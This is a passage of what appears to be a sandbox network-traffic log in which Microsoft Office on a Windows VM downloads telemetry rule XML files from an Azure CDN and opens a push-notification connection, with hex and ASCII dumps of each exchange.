                                                                                                                                                                                    2024-11-29 18:49:42 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:42 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                    x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184942Z-174f7845968vqt9xhC1EWRgten000000108g00000000p5wz
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    60192.168.2.64977313.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:42 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:42 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                    x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184942Z-174f7845968kvnqxhC1EWRmf3g0000000m5g000000006tnp
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    61192.168.2.64977213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:42 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:42 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                    x-ms-request-id: e297b188-201e-0000-7a1b-41a537000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184942Z-174f7845968frfdmhC1EWRxxbw00000010fg000000001gya
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    62192.168.2.64977420.198.119.143443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:43 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 34 6c 30 43 57 70 48 63 53 55 47 75 2f 38 79 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 37 38 31 34 61 64 37 64 66 38 38 39 64 66 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: 4l0CWpHcSUGu/8yL.1Context: 547814ad7df889df
                                                                                                                                                                                    2024-11-29 18:49:43 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                    2024-11-29 18:49:43 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 34 6c 30 43 57 70 48 63 53 55 47 75 2f 38 79 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 37 38 31 34 61 64 37 64 66 38 38 39 64 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 39 7a 2b 50 5a 4c 67 39 31 67 42 54 59 51 52 67 6c 6f 56 44 6d 62 79 38 54 4b 65 6d 74 74 79 32 6e 35 43 4a 35 63 2f 71 55 49 31 57 6a 4b 41 38 6f 43 33 58 49 77 50 53 51 47 62 42 47 4a 53 58 41 49 47 49 74 63 42 6f 63 7a 53 67 31 52 79 4b 31 49 62 50 2f 74 6a 62 30 50 6a 61 41 4f 76 4b 79 63 33 47 36 50 36 73 58 77 2f 47
                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 4l0CWpHcSUGu/8yL.2Context: 547814ad7df889df<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAa9z+PZLg91gBTYQRgloVDmby8TKemtty2n5CJ5c/qUI1WjKA8oC3XIwPSQGbBGJSXAIGItcBoczSg1RyK1IbP/tjb0PjaAOvKyc3G6P6sXw/G
                                                                                                                                                                                    2024-11-29 18:49:43 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 34 6c 30 43 57 70 48 63 53 55 47 75 2f 38 79 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 37 38 31 34 61 64 37 64 66 38 38 39 64 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4l0CWpHcSUGu/8yL.3Context: 547814ad7df889df<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                    2024-11-29 18:49:43 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                    2024-11-29 18:49:43 UTC58INData Raw: 4d 53 2d 43 56 3a 20 59 43 49 5a 4e 32 41 4f 31 30 65 4f 34 6d 4c 62 43 41 45 61 35 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                    Data Ascii: MS-CV: YCIZN2AO10eO4mLbCAEa5g.0Payload parsing failed.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    63192.168.2.64977513.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:43 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:43 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                    x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184943Z-174f78459684bddphC1EWRbht40000000zyg00000000kv2r
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:43 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    64192.168.2.64977613.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:44 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:44 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                    x-ms-request-id: bf7ba01b-c01e-007a-6b4e-41b877000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184944Z-174f7845968swgbqhC1EWRmnb400000010m0000000000c0x
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    65192.168.2.64977713.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:44 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:44 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                    x-ms-request-id: c77db93f-b01e-003e-210f-418e41000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184944Z-174f78459685m244hC1EWRgp2c000000105000000000a7f8
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:44 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    66192.168.2.64977813.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:44 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:44 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                    x-ms-request-id: 4defd72f-901e-005b-7278-402005000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184944Z-174f7845968pf68xhC1EWRr4h800000010q0000000000fq5
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:44 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    67192.168.2.64977913.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:45 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:46 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 485
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                                                                                    x-ms-request-id: 352cddbf-b01e-005c-1563-404c66000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184946Z-174f7845968nxc96hC1EWRspw8000000104g000000004f4a
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
